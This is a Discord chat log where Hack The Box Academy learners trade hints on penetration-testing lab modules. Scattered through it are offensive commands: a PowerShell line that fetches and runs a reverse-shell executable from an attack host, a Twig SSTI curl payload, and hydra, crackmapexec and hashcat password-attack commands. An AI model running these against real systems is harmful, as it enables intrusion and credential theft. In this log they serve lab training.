#modules
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
You have to tear defender out of the machine if you're gonna build a windows attack VM
^
ok kali it is then cus i have some knowledge of kali
Whichever you're comfortable with
The modules tend to focus on one or two tools and in-depth usage (nmap for example) and use cases (with a few examples)
Also if you buy any number of cubes, you get unlimited pwnbox usage instead of subscribing
i would but i want to learn as i go u know
when i get the fundamentals down
then i might subscribe
The fundamental courses are "free" as in they cost 10 cubes, but refund 10 on completion
So you could do all the fundamental modules (tier 0)

Can I make a suggestion on enumerating pop3/imap with creds? Try evolution
Anyone know how to hack passwords?
For the life of me I can never read emails via command-line
Multiple ways: but I suggest reading #rules
Can someone help with Password Attacks - Hard? I have initial login, but can't crack the password manager. Should I look in a different direction?
Nvm. If using hashcat, always check you're using the right mode...
anyone know the default ssh login credentials?
for dns subdomain enumeration how would you know which wordlist to use given that there are so many?
Hi, I'm in the Tcpdump Packet Filtering section of Intro to Network Traffic Analysis (module 81 section 785) under the Looking for TCP Protocol Flags section. The material explains that the tcpdump filter tcp[13] & 2 != 0 will only display TCP packets with the SYN flag set by counting to the 13th byte and looking at the 2nd bit for a value of 1.
Looking at the TCP header diagram attached, I can see that we're in the 13th byte; however, the SYN flag appears to be in bit 14. How are we determining that bit 2 is for the SYN flag? The picture shows at the top, bits counting from 0 to 31 from left to right, yet if it were bit 2 of the 13th byte, would we be counting from right to left (little endian)?
Running that filter in tcpdump does, in fact, show SYN packets. I'm confused as to how we know it is bit 2.
Can you help me?
VMware Player is fine if you only want to run a single VM at a time. If you want to run multiple VMs simultaneously, choose Virtualbox. Besides that, there is little difference between the two for general usage.
which would you recommend more for a beginner
i am going to be using 1 vm i think atm
im not sure why i would need more
Virtualbox. However, I've never used VMware player due to that single-running VM limitation.
Whichever you find easier to use, try both and choose 🙂
i see for the long run i guess virtualbox will be better cus of no limitations so i might go with it as well
Hey guys I’m new here. I just downloaded the parrot and VMware player to get started on my labs. When setting up the VMware wizard, will my guest operating system be Linux with a Debian 5 64 bit version?
Currently on Attacking Common Services - Hard and when listing users through task manager || PS it only shows that Fiona is connected... If this is the case how can i find my impersonation targets other than reading the names of the users' folders? I did and basically guessed the 2nd to last question because there are only 3 choices (I was grasping at straws), I have the creds pulled from all of their files within the share (thus how i pwned fiona) but now im stuck on the last question @>@
enumerate MSSQL.
also note that MSSQL accounts can be separate from the accounts on the host.
am experiencing a strange issue with Password Attacks Medium lab, cannot ssh, but can cme. Few days ago bruteforced mike and dennis, and downloaded Docs from smb. Cracked two passwords, got jason root. Since yesterday cannot ssh with any of them, even using id_rsa with mike "sevens", although in my history and notes few days ago I could. Jumping from one question to another am confused, maybe I have to allow the remote access, but through which user: k,s,d,w,j? Regenerated the VPN, but nada
for dns subdomain enumeration how would you know which wordlist to use given that there are so many?
A “fierce” one
yo can someone help im trying to install kali on oracle virtualbox and i get this error
@cinder mortar - I think the general thinking is to use "big" list. Seclists has a few, I think there's a good jhaddix one in there. The obvious issue with the "effectiveness" of a wordlist is obviously connected to how many words are in the list. The longer the list, the longer the time.
That said, for CTFs a smaller "raft" list or some of the "dirb" and "dirbuster" lists have tended to be alright.
Has anyone done the file inclusion module? I finished it the other day and I was only able to get a shell on 2 of the exercises.
I can get code execution on all of them, which is the point of the modules, but I'm unable to get any kind of web shell. Additionally, whenever I try to wget from the machine, the machine resets. So I'm wondering if getting a shell is a goal?
That's my issue, logging into mssql is what has me stuck
fixed
@quasi scarab - what'd you do to fix it?
do you have creds?
My Latest failed command => sqlcmd -S SRVMSSQL\SQLEXPRESS -H WIN-HARD -U Fiona -P '4......!........' -y 30 -Y 30
you need to go in ur computers bios and enable virtualizing on ur cpu
@quasi scarab - ohhh! thanks! 😄
you're welcome
Yep I pulled them all down to my ATTKR and made a wordlist
i used mssqlclient so i'm not sure if there's an issue with your command
@fresh reef - if it works, it might be worth checking what commands the metasploit module runs so we can just run those in the future - there's a lot of interesting msf voodoo
0.0 Heard
Nope didn't work been stuck here for so long lol
there is already a built in tool/app that you can utilize
You could try using hashid
May I DM You 0.0
?
not needed, just click on the windows button of your RDP session and you will find it
I did a while back, and still could not log in
is there an error message when you attempt to RDP into the target?
Within the studio or manager?
studio
I have no clue what it could be, past switching the auth method...which renders the same errors
It did not show anything
I tried many website but did not identify this hash
Which module are you doing?
What did you mean here? There is only one server 0.0
........i did nothing different...and now it works 0.0
Attacking Common Services Labs are sus
lol @autumn pilot & @dim wolf thankyou for the help...it was the instance
Iirc, There’s the one you are on, and the sql server itself
Huh? lol I dont doubt it, i just don't get it so the correct server is not WIN-HARD\SQLEXPRESS ?
yo are you only allowed to do one module a month on the silver program, because its not letting me buy another module and I dont see anything on the plan details.
Are you silver monthly or silver annual? If you're silver monthly, you'll get new cubes each month; how many do you have left?
Random question, but does anyone here know how to compile a python script to a Windows 64bit executable.....using pyinstaller....it yields a 16 bit exe which windows refuses to run
sudo pyinstaller --onefile -w get_external_ip.py
Yields the 16 bit exe....was hoping for a simple flag or something
Anyone care to help or nudge on Attacking Common Services - hard lab?
nm probably this flag --target-architecture
If this has nothing to do with academy modules go to #bot-commands , verify your HTB account, and post in programming or one of the other txt channels there
awesome thank you
Monthly, I have 140 left and the thing im trying to buy is 10, I do already have another module started that I havent finished
Hello everyone
Just learn GOlang
Can anyone assist a bit with windows pe module ?
Hey, can anyone explain to me why the following command is not working: smbclient -N -L \\IP\ while smbclient -N -L ////IP// works? What's the reason for that?
Slashes gotta be right way I think
nvm my ad blocker was messing up the website.
smbclient -N -L \\{TARGET_IP}\
this is the answer from the instruction and its not working on my machine
Backslash is an escape character, so you have to double them up. (I think it's optional for forward slashes.)
You can use // instead
there are 4 slashes but i think on dc only 2 are visible 😄
yeah but I would like to know why its working in such a way
yes im on vpn, using right ip, all according to the instruction
someone has done this: ?
Introduction to Bash Scripting
Flow Control - Loops
Got the flag, but it doesnt work 😮 ?
i know the solution but i would like to know the logic behind that
Any additional spaces in your copy/paste?
No
so ... ?
Go over the module again and re-evaluate your code and what the question is asking
anyone mind giving me a nudge on sqlmap essentials Bypassing Web Application Protections What's the contents of table flag10? (Case #10) keep getting the ('TypeError: Strings must be encoded before hashing')
hi everyone, almost done with the file upload skills assessment - read the file where we can see where its being uploaded, got the correct extension to bypass all filters, what is the problem now that for any file that i upload i cannot find them..not sure what im doing wrong now, if anyone can give me a hint or some help that would be much appreciated. thank you!
try saving the request into a file and try sqlmap on that file
hint you will need to find a way to read the ||source code|| first
for source code you mean to see how and where the files get uploaded ?
@iron basin @crisp remnant sorry for the ping if you guys got help or got it already but shoot me a dm if you guys still need help with that
I just found an unintended exploit on the skills assessment of Linux Priv Esc
yes the source will have both of that and one more thing
@vital adder Thank you, I got help. If anyone needs help on the Attacking Common Services labs, let me know.
i found 3
are you free for a quick DM? don
sure
was pk one?
yes and 2 more
i think me and jarednexgent did have a little chat about that here 🤣
Lol once you're in you don't need to care tbh and the fundamentals stuff I'm sure have multiple vulns
Anyone else getting the error "There are no available instances. Please try again later." ?
I have found that one on other platforms as well. I know I should go back and find the intended way but man if someone opens a door for you, you walk in.
Getting multiple people reporting "There are no available instances" , anybody else?
Yep
been trying to load up one for the past 20mins
just getting the same error, no available instances.
I am trying to work with an instance but it seems to come and go. Can't figure out if it's the VPN connection or the target
does HTB know?
For me "Target failed to spawn :(" 😭
@high zinc are you guys aware of this issue?
or maybe @uneven forum , @tepid arrow, @languid fjord
Contact support on the platform please
already have, just setting peoples expectations
hopefully they know the impact, about to have 30 students try to do a lab and it's not going to work
sounds like plan B time
Yeah, bedtime.
all the instances are too busy powering my AD experience
So I managed to get it running without saving the request, but not getting the results I'm looking for while using --batch --dump. Going to play with it a bit more after my son goes to sleep
Tip for new people that i've found helpful myself: if you see a command and want it broken down you should use ChatGPT. (As a last resort if you can't figure it out using "man" or "-help" etc.)
for example
match command-line arguments to their help text
Hi all. I'm trying to spawn a target instance to complete a module, but I keep getting a target failed to spawn error. I refresh the page as suggested, but it still doesn't work.
We're aware of the issue, unfortunately its being caused by a 3rd party provider.
No worries, thanks for letting me know.
Hi everyone! how you doing? Could anyone drop a hint on the last question of: Skills Assessment Website assessment? Dunno if I am bruteforcing it right or not
Where are the real ones at?
Is someone free to chat about XSS?
Getting over burnout by playing with sliver
If it's regarding a module; just ask bro. If not verify your account in #bot-commands and post question in relevant channel or in #1024429874246590575
Tried googling sliver game... Did you mean silver? the action rpg?
no lol. I mean sliver the C2
I've had an itch to do some evasion work for a while. Not doing it caused a great bit of burnout
so now im doing it
Defender has been bypassed lol
yeah its regarding the "getting started" knowledge check part. I have been trying for three days to get a shell through a XSS vulnerability. I verified its a vulnerability by creating a popup and also I was able to download a file from a server I set up. However, for the life of me I can't figure out how to get a shell. I found it in a text box that I can submit. I am completely stuck.
XSS doesn't usually lead to RCE
oh shit.
More often than not the best thing you can do with XSS is steal cookies from an admin
i already have the admin login. I guess then I want to have it upload a file into the server which would then create the shell. Okay. I guess I have to find something for that.
Getting started; nibbles section yeah?
yeah, got through that now im on the get-simple cms
i tried with metasploit, but it kept telling me that it couldnt authenticate.
steal cookies or bypass csrf tokens.
xss can be RCE for some node.js applications however
Did you supply metasploit with the credentials?
True but thats not super common
yeah just something to be aware of
Also as a fundamental module, they aren't expecting you to have the XSS knowledge to access it
yeah thats what i figured but I got stuck and just started googling and found the xss
I had a bit as well. Been doing THM boxes for fun for the last week and a half.
What are the options you have to set for metasploit?
what is the "full uri path to GetSimplecms"
getting started: knowledge check
Uri is the http://IP/folder/you're/exploiting
Uri can be used synonymously with URL
okay. I presumed that too but wanted to verify.
There's a couple of differences but they're negligible at this stage
Exploit aborted due to failure: no-access: 10.129.224.54:80 - Authentication failed this is the error I get.
does that mean the port is wrong?
What is the port you're accessing the webpage on?
80
Auth failed means that it failed to authenticate the user
Also remember: case sensitive
For user and pass
alright so i have been changing my URI and something different happened: Exploit aborted due to failure: unknown: 10.129.224.54:80 - Upload failed
[*] Exploit completed, but no session was created.
Run check to see if there's something that may be missing
Not at my computer ATM to double check things
alright to 10.129.224.54:80/admin/ is the location of where I sign in as admin. is /admin/ the targeturi? check states: Cannot reliably check exploitability.
i'm ||dumping the NTDS.dit|| in the AD skills assessment 1 but ||i'm doing it over proxychains|| so it's taking forever......
I dont remember having to DCSync over proxychains 🤔
Oh no, never mind
My notes say otherwise
Rip
Remember, if you just need a specific user you don't need to dump everything
also working in this recently discovered powershell-empire and have been using it so far so good, got all the powershell tools under one framework and attack platform
Empire is ok. Not my favorite tho
whats your favorite?
thought powershell-empire would be very suited for the AD skill assessment, sliver got a lot of ad stuff in it?
Some. I haven't used it for a ton of AD. But I believe there are a bunch of extensions to load all the common AD tools directly into memory
that was a waste of time.
Lmao. Why?
||all i needed was local admin hash||
Rippp
Hi, can someone help me for Skills assessment of pivoting, tunneling and port forwarding module?
i am at the last question i know the DC is 10.5 but pass the hash is not working
not sure what other thing i am missing
hey i cant connect to the ad module's windows foothold host it keeps showing a black screen and throws this error continously
Press enter a few times, in the RDP window.
It always shows that error, no matter what.
it worked thanks!!
hello, I'm having a bit of trouble with the file upload attacks - blacklist filters part
regardless of what extension I pick to upload my shell it doesn't execute, it just gets displayed on the page
Did you combine both lists they suggested?
i think i only used the seclists web extensions one
There should be 2. If you look at all the screenshots in that module, you should see one with some payloads that you didn't check.
need some help. currently on the medium lab for the footprinting module. Have been able to access the UI for mssql but unable to connect via the console. it just times out.
Now i'm lost how to navigate in here to find the user?
Anyone? Just a nudge would be nice
you were right, thanks!
can u elaborate more?
basically,
i have pivot all the way to 172.16.10.25
i know that the DC ip is 172.16.10.5
basically i am trying to gain access to 172.16.10.5
i was trying pass the hash but the hashes i gotten from mimikatz do not seem to work
like how do i gain access to the Domain controller
i think the issue i have is the password 😅
u need to dump the lsass
@brisk geode may I dm you?
i still cant get it
sure
hi, any idea why this command fails to replace newlines with single quote space single quote in a text file? sed "s/\n/'\s'/g" payloads_all_the_things_php_ext
could use some help with the whitelist filters part of file upload attacks
nvm
the rdp connections in the module active directory introduction in the guided labs are not stable. they disconnect constantly. in case there is someone online who can forward this to a place where such problems are taken care of
nope, u can't do that lab. it closes so often. not possible.
Hi, I am completing the report writing module in order to pass the CPTS, however I am stuck on the Tmux shortcut question. I know the answer to the question but the formatting [key] + [key] + [key] is not acting friendly with me.
Can somebody help please ?
hey guys
what course or document(or book) do you recommend for javascript security(for bug bounty hunting) and practical for hunt?
the answer is 4 keys
still not valid, and this is how I do it usually, can I dm you please ?
yes
hello
SSTI Exploitation Example 1, i have the shell and tried grep -E 'HTB{.*}' $/usr/bin/env.
but no output, any hints?
not sure if its me or the service, but i'm attempting a module that wont let me nmap a spawned target
im using a pwnbox vm on my computer that is connected to the academy vpn
when i go to the link in firefox, it takes me to a generic word press page
if your target is a docker container then you can't ping or scan it
you only have access to the only port the target was given
which module and section are you on?
getting started public exploits
you can only scan a target machine if that target is on a vm which will not give you any port only an ip
also this is all you get for this target and you'll need to find a "public exploit"
correct
i was trying to do an nmap scan to get the service so i can look for an exploit
Hi MRtom, yes you're here 🙂 i am at the module SERVER-SIDE ATTACKS, section SSTI Exploitation Example 1
Hello🏳️🌈
oh wait a sec so wtf are you doing with the curl command ?? hint you have to exploit the web site
jarden wrote once he solved it with curl....
oh 🤣 must be an unintended path
hello everyone. I need help with shells and payloads - the live engagement / host 2. I saw a mentioned exploit on the blog.inlanefreight.local and put it in the exploits directory. I use it in msfconsole and I am constantly getting an error. The 1st problem was the rhost, I put the inlanefreight.local ip. And now it says Exploit failed: NoMethodError undefined method `split' for nil:NilClass . I also tried to use burp and change the file from there without success.
oh wait sorry i misread this so you got a shell but having issue finding the flag?
You need to specify vhost
yes
so you can try this command (this is what i got my in note)
grep -irl HTB{ /
and you can add 2>>/dev/null at the end if you are getting too many errors; also this grep command will start at / so it's going to take a good while
and you can try it in a couple of ||env path|| of course
i will try that. thanks!
I am still getting the same error
I've tried every ip on ifconfig by the way hahaha
It should be from the 172.16.x.x iirc
Or at least the 172 ip
As the LHOST
Did you also specify the RHOSTS?
This exploit is really weird about it
The blog one?
yep
I ping the blog and it gave me the inlanefreight.local ip
the weird thing is there is no lhost option
hahaha
It should be
there is rhosts and rhost
If you're using the .rb exploit they're expecting you to
the payload is a bind shell so there is no LHOST
Ah now I remember; check your computer or something for login information
;)
Spoiler
But there is another way to get the login creds
I'm stuck at the File Upload Attack Web Assessment. I have to read the source code to find the upload directory. I can't find it. I however found the working upload.php attack file. How can I find the uploads directory? I tried fuzzing, but no success.
if you got the source code, read it
So you've done it with this payload and this payload indeed works right. hahahaha omg I've spent a couple of hours and done other hosts within a couple of mins. It is really bothering
Yes
i think i got the correct payload, but the response is just a base64 blob image
Double check the image for the attack ip for the blog site
why is it that when i get an error for ||downloading a file on SQL01 with a powershell command, the host can't connect back to my box to download another file and i have to restart the infrastructure|| on the AD attacks skill assessment 2?
almost right try with a different magic number and images extensions also for the upload directory first get the source code and read it
as it turns out, even ||successfully downloading a file will make me unable to download another file||
i'm not sure how to proceed
might just try the ||nishang powershelltcp script|| instead
Hey, i'm currently working through the linux fundamentals module, i'm on the service and process management section and i'm trying to find the answer for the page, the question is
"Use the "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles managed internally by snapd" as the answer."
So i'm running
systemctl | grep load
But there are no results with that answer in the description, can someone point me in the right direction?
it looks like you're not SSH'd into the target
i've tried other words too, snapd etc
ohhhhhh my god
what a clown
i just realised i closed the terminal, but didn't SSH back into the target
thank you
i'm going to have a short nap after this LOL
so you have a shell on the target machine but can't download file?
i'm using ||xp_cmdshell|| and if i download something with ||Invoke-WebRequest|| it will not download another file again
i'm trying to do ||IEX|| rn
just use wget 🤣
isn't wget just an alias though?
not if you use it with powershell (so powershell wget)
powershell -c "wget ..." ?
not sure about that i just use powershell wget (my ip / file) and an -o at the end to output the file
*with a name of course
and did you give it an output location?
i mean in the command
yes i gave it an output location
if it is hanging try running the shell
but basically this is my command
(spoiler) powershell wget 172.16.7.240:8000/reverse.exe -o "C:\Windows\Temp\reverse.exe"
(spoiler) "C:\Windows\Temp\reverse.exe"
could anybody give a small nudge on the file upload attacks skill assessment?
I'm trying to read the source code of the website but for that i need a directory name (ie /var/www/html/directory/yaddayaddayadda) and I can't really figure it out
or maybe I'm going the wrong direction?
i guess i should have gotten a shell onto the host first instead of trying to download more than one file using xp_cmdshell
thanks
anyone mind giving me another nudge on sqlmap essentials Bypassing Web Application Protections What's the contents of table flag10? (Case #10) figured out my problem i was having with the ('TypeError: Strings must be encoded before hashing') but now im stuck trying to retrieve the flag. I can dm my command for review.
sure you don't have a trailing space from copy pasting the flag?
dm me the flag you found
still could use a nudge for the file upload attacks skill assessment
I wasn't asking you in particular I'm asking the server in general
is this a markdown typo ? XD shells and payloads > infiltrating windows
@unique valve
Ah yes it does look like theres a period there between here and the url. Would you mind posting that in #858470491676737536 too?
i'm not the server but that's the issue?
lol nevermind I have progressed, I am now trying to understand what I don't understand in some seemingly very simple php code
i did link a w3schools page (for the php code part) a while back but i don't have the link saved for some reason
if you are having issue with php they should have something that you can play with
i think i figured out the php
but i uploaded an image to give it a whirl and when i try to visit it using the naming convention I understood it doesn't seem to work, so I must have something wrong somewhere
i'm stuck in the last part of buffer overflow linux, i can change the eip to x66666666 but i'm doing something wrong that i cannot get the reverse shell.
Someone could help me?
here found my old link https://www.w3schools.com/php/phptryit.asp?filename=tryphp_date1
can i shoot you a quick dm?
sure
Having a lot of issues with the instances and targets on academy today, anyone else? trying to ssh to the target and just getting stuck with nothing, then refresh it and it says the ip isn't recognised etc
i had no trouble an hour ago but i'm in US
it'
it's working again now, but yeah been having some issues all day just being a bit funky
so its happening again, suddenly it won't let me type in the terminal but i can scroll up and down, so i close the terminal try and ssh again but just get stuck here
have to terminate the session and start it again
annoying because i only get a couple hours a day to do this and both yesterday and today the instances been plagued with issues.
if any other command worked fine and just the ssh command hangs then the issue is on the target machine, and because your ssh command can't connect it just doesn't know what to do and hangs
if anyone has any explanation as to why the .||png|| extension doesn't work for the file upload attacks skill assessment and can enlighten me I'd be very grateful
cuz considering the filters in place it should work
Could use some help. I'm stuck at Password Attacks - Pass the Ticket from Linux.
I'm unable to get the credentials of the user svc_workstations. I tried to crack his AES-256 hash with crackstation, rockyou, password.list, custom.rule, etc. I get absolutely nothing. What am I missing here?
what mode are you using for cracking the password?
^
hi i'm new here
@obtuse leaf Hi Welcome to HTB.
Thanks🥰
-a 0 -m 1400
does the hash that you have saved correspond to that mode?
hello
Yes. But it seems i need to extract the hashes from a different keyfile. Brb, gotta try a few more things.
+1
#rules ; this channel is for talking about and discussing modules found on https://academy.hackthebox.com; off-topic conversations go in #general which you'll need to verify your htb main account over in #bot-commands on ( https://app.hackthebox.com )
I've figured it out. You don't need the svc_workstations keytab but the keytab from a different user.
👍
Firewall and IDS/IPS Evasion - Hard Lab . I keep seeing the same 2 ports coming up with no other services. I have tried aggressive scanning and only get 2 options of services.
try a wider scan; this lab can be a pain at times because the port it wants you to check is a pain
I keep getting the same 2 TCP ports even when scanning all ports
have you tried different scanning methods (-sS, -sT, -sU, -sA)
all of them, I still get only the same 2 ports, it takes about 10 min to complete each one as well. I have tried resetting the target to see if maybe there was an error
sec let me rerun this to see if there's something i'm forgetting
hello. does anyone know how to insert a function that deletes all the data available in an excel file after a certain amount of time
as this is not a module related question; you should ask in #1024429874246590575 or verify your https://app.hackthebox.com account in #bot-commands and post in #programming to see if you get an answer
need some help with: Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
**Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.**
proxychains psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/administrator@ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -k -dc-ip 172.16.5.238
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password:
[proxychains] Strict chain ... 127.0.0.1:1080 ... ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.5.238:88 ... OK
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
Just let me know if I am on the right track. I ran an ||NMAP scan and know that 88 and 445|| is open so I am pretty sure psexec should work.
"KDC_ERR_WRONG_REALM"
with python Write the function signature (def ...) for a function "foo" that has one argument "bar", including the trailing colon. My answer = def foo(bar:): .... can somebody tell what is wrong??
@fathom pendant I think I found my response after reading the instructions again
it's not saying you're wrong it's just that where you're trying to go isn't in use
Yay! Finally got around to finishing Windows Privilege Escalation 😄
but also thanks for reminding me I needed to revisit that as I, for some reason, do not have notes on that lab
if you want to DM me the scan you ran/output as I just did a scan and got the expected output go for it
is psexec that right path or should I be looking else where?
I'm just reading the error it's providing ¯\_(ツ)_/¯
it says "reserved for future use" so idk
wrong realm... check the dc ip flag.
SERVER-SIDE ATTACKS, SSTI Exploitation Example 1, i don't get it....where is the flag? once i have the shell with tplmap,
why do these commands show nothing: grep HTB $PATH or grep HTB $HOME
Anybody know?
curl -X POST -d 'name={{_self.env.registerUndefinedFilterCallback("HTB*{")}}{{_self.env.getFilter("id;uname -a;hostname")}}' IP:PORT
nothing
if somebody has the solution, just dm me please 😉
i would appreciate it
I could use some help on the DNS info gathering. im not sure which ip address the first question is asking for i found a few of different subdomains and there doesnt seem to be a www. subdomain
I ended up figuring it out. stupid oversight on a mistake. Got the flag... Thanks
You can ask in #1024429874246590575 or verify your hackthebox account in #bot-commands and post your question in #web and someone may be able to answer. As this channel is for questions pertaining to the modules found on https://academy.hackthebox.com any non-academy related questions will generally be ignored here
HTB Academy - File upload attacks - Skills Assessment - Totally stuck. Trying to read upload.php but I only see base64 encoded text of the image I uploaded.
ok update. the question asking for paydiant.com IP is not working at the moment. seems the site is down.
lol. once again 3 hours no progress. sometimes hack the box is just frustrating...
if you have shell, my go to flag hunt out of frustration is grep -R HTB / 2>/dev/null
assuming the flag format is indeed HTB
if it isn't they usually give you the filename to look for
Hi all,
I'm in the Password Attacks module, Password Mutations section. I have made a list using Hashcat using the password.list and custom.rules from the resources .zip file like this: ||hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list||. Then used ||crackmapexec ssh 10.129.235.57 -u sam -p mut_password.list|| to brute force the login. It has been running for more than 30 min now, indicating that I did something wrong. Can someone give me a hint please?
That section legit can take 30-45 minutes to finish
also SSH is the slowest service to crack, you'll be better off finding a faster one
Whoa ok, will try FTP i guess. Thanks a lot!
Hello can I have some help with windows fundamentals?
I have no shell, if you are asking me
I want to create a new user for Windows Fundamentals.
I've only ever created users through Start and haven't done so in PowerShell in a long time.
Can someone help me?
no output till now....
Is that for me?
Let's take this to my post.
lol, I wanna have my 3 hours back
as in, did it work? lol
hack the box is good. but this part from hack the box is in my opinion just bad. what did I gain from my 3 hours, nothing but frustration, I learned nothing... I mean I work the whole week and in the time I have, I want to learn something....
no sorry did not work... maybe I do something wrong on another end...
In the question they say the answer is in an environment variable. ||Try the command printenv||
ah well there ya go
if they say the flag is an env var then searching the filesystem won't be useful
I did.
you learn the most when you spend three hours making mistakes though
once you figure it out you probably won't mess up again
I like how vague HTB questions can be
is this shell from a newly launched process? maybe it didn't inherit the environment properly. Try using your original injection to run the env command and check its output.
Pretty random, but recently my instagram got hacked and they started promoting bitcoin etc in my name and posting stories and posts etc.
I was just wondering if anyone here knows somehow how to get back into that instagram account. Big ask, but if anyone can do this it will be much much appreciated.
Dm me
No
this is for academy discussion
go away
Contact instagram support
They don't have customer support/service sadly
I'm stuck in the last part of Buffer Overflow Linux, I can change the EIP to x66666666 but I'm doing something wrong that I cannot get the reverse shell.
Could someone help me?
try the curl example to run the command instead of tplmap
I just did it and it works
can i dm you?
Yes
I'm stuck on the module WINDOWS PRIVILEGE ESCALATION. Especially on the section "Windows Privilege Escalation Skills Assessment - Part I".
I succeeded in performing a privesc to get SYSTEM, but I can't find the answer to one of the questions:
I tried to find files that contain 'ldapadmin', I tried to look for .sqlite files, I tried LaZagne, Snaffler. But nothing. Can someone help me?
I need some help with AD Attacks Skills Assessment 2. I need a stable way to transfer files over to a host because every time I choose to use PowerShell to download files from my attack host to the SQL server, the SQL server has a random chance to just hang and I need to restart the infra. Tried SMB shares, which got blocked by the policy, and the host can't find my WebDAV server.
going to try living off the land next
General question for folks going through the modules. Are you taking notes on, well, practically everything? I always feel a strong urge to write every example command down for example. I know tons of this stuff can just be googled, but not sure how I'd remember that, *oh I can use seatbelt for windows enumeration *
well, for the commands part, even though I haven't started yet, I am going to create another set of notes just for commands divided by sections
I am thinking about taking the cpts that's why
I guess the answer is it is all about your goals
Yep that is sort of what I am doing. I took one of the cheatsheet.md files provided and started adding onto it... actually created a private repo that I've also started putting things into that might be helpful to clone to another machine.
I figure this way. I can just clone it whenever I need it, has all my notes and useful scripts I might need.
It is a lot easier to check your notes rather than Google, especially when you know where to look. But sometimes it is the other way around. Some of my notes are really messy
100% agree... I think that might be what I struggle with most at this point... I think what I'm going to do is just try and have general categories and then applicable notes for those... once I complete the course and before the exam I will organize everything correctly so it's easier to navigate.
I tried ||hydra -l sam -P mut_password.list ftp://10.129.139.13 -V|| and ||crackmapexec smb 10.129.234.160 -u sam -p mut_password.list|| but the host times out before the password is found. If I wc mut_password.list I get 94.044 lines. Is that correct?
Yes, extremely extensive notes and then reorganizing and restructuring notes once new stuff comes into play. It's a very time consuming process imo, but it does seem to work.
Yes
very glad I am not the only one 🙂
You can cut the first 17k lines and should get it
The cert doesn't make the #hacker, the skills do! 🦹
And what better way to polish your #pentesting skills than to pass the #CPTS exam?
Here are 4 useful tips to become a certified #pentester! Put them in action now: https://t.co/ayI3jyzbgo
#CyberSecurity #PenetrationTesting
Which module? If i remember correctly focusing on B************
What is the purpose of this section? 😂
Password Attacks module, Password Mutations section. I made it past B in the SMB run, all the way to chocolate99
Example of mutating passwords to common variants using a set of rules
I'll have to check my notes tomorrow and then I'll give you a good hint, if you're still stuck.
Haha yeah, i get the concept, now let me get the flag! XD
Also you can manipulate how many threads hydra can use
Password Attacks - Network Services: I am trying to answer the last question. Medusa and Hydra fail to work properly with SMB; the only option I have is the msfconsole smb_login module. I run the module with appropriate options and use the password list provided. Before the module can complete, the box times out. Any help or nudge?
Thanks man! I appreciate it 👍
Try adding -t 64 to your Hydra command
sql01, why must you do this to me....
Awesome, will try that 👍
hah, SSTI Exploitation Example 2, I solved in 30 minutes. this is balm for my soul 😂
Regarding this question, can I inbox anyone?
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
Footprinting > DNS
Subdomains of subdomains
I solved it but I have some question
just ask your question here
I found the subdomain by accident.. It didn't show up in my initial search
xxx.inlanefreight.htb
So doing a dig any <ip> didn't show you anything?
anyone give me a nudge on AD attacks skills assessment 2? - Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
I found the following
How about A records
NVM, finally got it to work.
Or zone transfer
Can I get some assistance with module: password attack lab - hard?
Since this contains a flag please remove it
Hello there! I am working on the final section of the Login Brute Forcing module. The question implies I should have information about the target company, specifically the name of an employee, but I do not see such information in the section. Am I missing something?
I might be confused, The way the section talks about the task, I assumed the target IP/port would have been a webserver where I would find the relevant information. Instead the target is SSH
previous sections information
its really dumb
Ah! Thank you @thorn urchin
Maybe they should add a note to reference the previous section
I'm in the Information Gathering - Web Edition and having issues with the Virtual Hosts section. I can only get the first question answered. I found some hints in the forum, but so far nothing has worked. Any ideas why ffuf is only giving errors?
Hi guys, did anyone get stuck with File Transfer linux side?
I'm supposed to hash this text "048090bc7ed04f758658975df8f862c8" through "hasher" and it gives me 1219923e466ff7d194dc99a99da5b791 but the module does not accept it...
Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer.
Also... one question, if I spawn a VM on HTB, I can't download the VPN and connect via my Kali VM? I tried to "switch" but it didn't regenerate a new VPN and remove the previous hosts
Warning: Each time you "Switch", your connection keys are regenerated and you must re-download your VPN connection file.
All VM instances associated with the old VPN Server will be terminated when switching to a new VPN server.
Existing PwnBox instances will automatically switch to the new VPN server. 😦
Who has completed the AD Skill Assessment Part 1?
I don't need a nudge but would like to see if you did a certain area differently than I did, so I can add more stuff to my notes.
hey there, I need a nudge or hint towards 'What is the FQDN of the host where the last octet ends with "x.x.x.203"?' in the DNS section of Footprinting
I've used an AXFR zone transfer to identify hosts, but unsure where to go from here
sub-domain
sub domain on the hosts?
I figured it out! the box did not give me creds!
I have to do it all over again
I've found dc1, dc2, mail1 etc. so do I do a bruteforce on these?
axfr on the fqdns you found
Those sound like host names of machines, doing bruteforce on those won't be helpful, look for something that doesn't sound like a machine name
and i get a bunch of hosts back
hahaha i completely did the AD Assessment Part 1 the HARD way
so try the for loop using the ws1?
Hi, I'm stuck in the Hard Lab from Footprinting. I need a hint. I found a user and password, but I can't connect with SSH
Are you looking for a hint or an answer 😅 . I probably have already given too much away already. Dnsenum with the correct wordlist and sub-domain should do the trick.
true ok ill keep trying
im just seeing if i was on the right track
no results from the DNSenums
Read over the course material and make sure you are querying it correctly 🤷‍♂️
for the dnsserver parameter in the dnsenum command, I keep the IP address of inlanefreight.htb right?
or do i change it to the internal DNS
You should be querying sub-domains of inlanefreight.htb
Maybe you should be trying to connect to something else. You should be able to check what authentication methods the ssh server allows.
Got the same issue tho
So it looks like the boxes in the "service scanning" module just went down? Looks like they vanished in the middle of a module I was working on.
I am doing that :(
